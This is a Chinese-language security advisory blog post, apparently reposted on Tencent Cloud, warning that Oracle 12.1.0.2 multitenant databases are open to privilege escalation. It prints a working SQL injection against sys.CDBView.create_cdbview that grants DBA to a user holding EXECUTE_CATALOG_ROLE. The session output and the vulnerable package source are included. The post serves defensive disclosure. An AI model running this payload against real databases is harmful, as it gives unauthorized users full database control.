前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【安全警告】Oracle 12c 多租户的SQL注入高危风险防范

【安全警告】Oracle 12c 多租户的SQL注入高危风险防范

作者头像
数据和云
发布2018-03-06 17:52:12
1.1K0
发布2018-03-06 17:52:12
举报
文章被收录于专栏:数据和云

在使用Oracle多租户选件时,由于Container容器和PDB融合共存,则权限控制必将更加重要,在之前的文章中我们提到,Oracle 12.2 的 lockdown profile就是为了实现PDB中更为全面的权限控制。

我们在2016年『比特币事件』中,总结了数据安全的十六大军规其中有一条也明确提到最小权限守则,而且要真正实现权限管理

SQL注入攻击的风险

我们来看看如果权限控制不当,可能遭遇到的数据库安全风险。根据最近披露的风险之一,通过SQL注入可能影响数据库的安全,以下问题影响到多租户的12.1.0.2.0最新版本。

假如我们在CDB中拥有一个普通用户,因为某种原因它申请和被授予了EXECUTE_CATALOG_ROLE的角色:

SQL> connect / as sysdba Connected. SQL> create user c##eygle identified by eygle; User created. SQL> grant execute_catalog_role,create session to c##eygle; Grant succeeded. SQL> select granted_role from user_role_privs; GRANTED_ROLE --------------------------------------------- EXECUTE_CATALOG_ROLE

我们看看这一角色可能由此深入所做出的尝试,经常讨论的SQL注入也就在这个知识范畴之中。

当以下一个系列的SQL被执行之后,一个普通用户获得了DBA的权限,如果这是在一个多租户的环境中,这个提权将是非常危险的:

SQL> connect c##eygle/eygle Connected. SQL> select granted_role from user_role_privs; GRANTED_ROLE ----------------------------------------------------- EXECUTE_CATALOG_ROLE SQL> exec sys.CDBView.create_cdbview(true,'ALL_POLICIES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','yh_view' ,' */ execute immediate ''grant dba to c##eygle''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); * ERROR at line 1: ORA-00905: missing keyword ORA-06512: at "SYS.CDBVIEW", line 58 ORA-06512: at line 1 SQL> select /*+WITH_PLSQL*/ * from ALL_POLICIES; X ------- 1 SQL> select granted_role from user_role_privs; GRANTED_ROLE ---------------------------- DBA EXECUTE_CATALOG_ROLE SQL> select banner from v$version; BANNER ---------------------------------------------------------------------------------------- Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit Production PL/SQL Release 12.1.0.2.0 - Production CORE 12.1.0.2.0 Production TNS for Linux: Version 12.1.0.2.0 - Production NLSRTL Version 12.1.0.2.0 - Production

当然作为资深的DBA来说,我们应当知道EXECUTE_CATALOG_ROLE这一角色权限是非常危险的,要严格控制这一权限的授予。这一注入,实际上是利用了 CDBView 包的校验漏洞,进行了注入提权。

sys.CDBView 的主要内容如下(在安装脚本中是明文的),风险来自于脚本内部的校验缺失:

create or replace package sys.CDBView as ---------------------------- -- PROCEDURES AND FUNCTIONS -- procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2, oldview_name IN varchar2, newview_name IN varchar2); end CDBView; / grant execute on sys.CDBView to execute_catalog_role / create or replace package body sys.CDBView is -- Create the cdb view -- private helper procedure to create the cdb view -- Note that quotes should not be added around owner, oldview_name and -- newview_name before create_cdbview is invoked since all three are used -- as literals to query dictionary views. procedure create_cdbview(chk_upgrd IN boolean, owner IN varchar2, oldview_name IN varchar2, newview_name IN varchar2) as sqlstmt varchar2(4000); col_name varchar2(128); comments varchar2(4000); col_type number; upper_owner varchar2(128); upper_oldview varchar2(128); quoted_owner varchar2(130); -- 2 more than size of owner quoted_oldview varchar2(130); -- 2 more than size of oldview_name quoted_newview varchar2(130); -- 2 more than size of newview_name cursor tblcommentscur is select c.comment$ from sys.obj$ o, sys.user$ u, sys.com$ c where o.name = upper_oldview and u.name = upper_owner and o.obj# = c.obj# and o.owner#=u.user# and o.type# = 4 and c.col# is null; cursor colcommentscur is select c.name, co.comment$, c.type# from sys.obj$ o, sys.col$ c, sys.user$ u, sys.com$ co where o.name = upper_oldview and u.name = upper_owner and o.owner# = u.user# and o.type# = 4 and o.obj# = c.obj# and c.obj# = co.obj# and c.intcol# = co.col# and bitand(c.property, 32) = 0; begin -- convert owner and view names to upper case upper_owner := upper(owner); upper_oldview := upper(oldview_name); quoted_owner := '"' || upper_owner || '"'; quoted_oldview := '"' || upper_oldview || '"'; quoted_newview := '"' || upper(newview_name) || '"'; -- create cdb view sqlstmt := 'CREATE OR REPLACE VIEW ' || quoted_owner || '.' || quoted_newview || ' CONTAINER_DATA AS SELECT * FROM CONTAINERS(' || quoted_owner || '.' || quoted_oldview || ')'; --dbms_output.put_line(sqlstmt); execute immediate sqlstmt; ...... end if; end loop; close colcommentscur; end; end CDBView; / show errors; /

安全风险无处不在,提高安全意识刻不容缓。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-01-11,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 数据和云 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
容器服务
腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档